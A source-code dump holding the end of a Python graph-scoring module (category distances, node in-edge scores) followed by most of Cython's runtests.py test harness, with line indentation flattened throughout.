sh_paths[out_p[0]] = out_p[1]
# tell the out_q that the job is finished
out_q.task_done()
# tell the start_q that all threads shall be joined
start_q.join()
# setting up variables for the calculation of avererage and counting the infitives in our result
sum_vals = 0
i = 0
inf_count = 0
# iterate over the values we retrieved for the distances from c0 to ci in order to sum the values and count the infinitives
for x in sh_paths.values():
if x != np.inf:
i+=1
sum_vals += x
else:
inf_count += 1
# saving median, mean and infinity count as values in a dictionary. The key is the category to which we calculated the distance from c0
medians[cat] = [median(sh_paths.values()), sum_vals/i, inf_count]
return medians
'''
Functions for scoring:
'''
#function to assign every node only to one category
#@autojit
def key_substraction(cat_dict, org_cat, list_smallest):
return_dict = {}
# Get a list of categorys, sorted by the ascending distance from our C0
# (doesn't include our starting category so we don't have to iterate over it
keys = []
for key in list_smallest:
keys.append(key[0])
# iterating over the categories in a list we sorted by the ascending distance from our C0
for i in range(len(keys)):
if i == 0:
# getting the nodes of our starting category
org_nodes = cat_dict[org_cat]
# iterating over all categories in our list of sorted categories
for key in keys:
# assigning only the values of the current key minus the intersection
# of the values of the current category and our starting category
temp = []
for node in cat_dict[key]:
if node not in org_nodes:
temp.append(node)
return_dict[key] = temp
else:
# iterating over all categories again. but now we're only using the keys of the categories we didn't
# clean up yet. Same as before we're only assigning the values of Ci to Cn minus the intersection Ci-1 and Ci.
for x in range(i,len(keys)):
temp = []
for node in cat_dict[keys[x]]:
if node not in cat_dict[keys[i-1]]:
temp.append(node)
return_dict[keys[x]] = temp
return return_dict
#function to create the score for a node by the in edges
def no_in_edges(node, cat):
x = 0
# getting the number of in edges by counting all predecessors
# (nodes with edges pointing towards the node we're looking at) of a node.
for i in graph.predecessors(node):
#
if graph.node[i][cat] == True:
x +=1
return x
#create the score for every node in a category
def article_score_cat(graph, cat):
#get all the nodes of the current category in a defined graph
nodes = [nodes for nodes in graph.nodes if graph.node[nodes][cat]== True]
for node in nodes:
# set the score to the existing score (in the beginning 0) + the number of in edges of the current node
graph.node[node]['score'] = graph.node[node]['score'] + no_in_edges(node, cat)
def article_score(graph, cat_list):
for i in range(len(cat_list)):
if i == 0:
nodes = [nodes for nodes in graph.nodes if graph.node[nodes][cat_list[i]]== True]
sub_g = graph.subgraph(nodes)
article_score_cat(sub_g, cat_list[i])
else:
cat_nodes = [nodes for nodes in graph.nodes if graph.node[nodes][cat_list[i]]== True]
# sub_g_cat = graph.subgraph(cat_nodes)
# article_score_cat(sub_g_cat, cat_list[i])
for node in cat_nodes:
nodes.append(node)
sub_g = graph.subgraph(nodes)
article_score_cat(sub_g, cat_list[i])
for node in cat_nodes:
for pred in sub_g.predecessors(node):
if graph.node[pred][cat_list[i-1]] == True:
graph.node[node]['score'] = graph.node[node]['score'] + graph.node[pred]['score']
return sub_g
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
